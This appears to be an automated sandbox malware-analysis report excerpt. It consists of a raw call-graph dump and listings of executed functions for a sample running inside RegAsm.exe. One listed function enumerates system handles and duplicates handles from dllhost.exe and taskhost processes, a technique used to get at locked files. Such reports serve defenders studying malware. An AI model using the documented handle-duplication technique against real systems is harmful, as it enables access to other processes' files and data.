40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                                                Executed Functions

                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                APIs
                                                • memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                • memset.MSVCRT ref: 0040DF5F
                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                • API String ID: 2018390131-3398334509
                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                • free.MSVCRT ref: 00418803
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
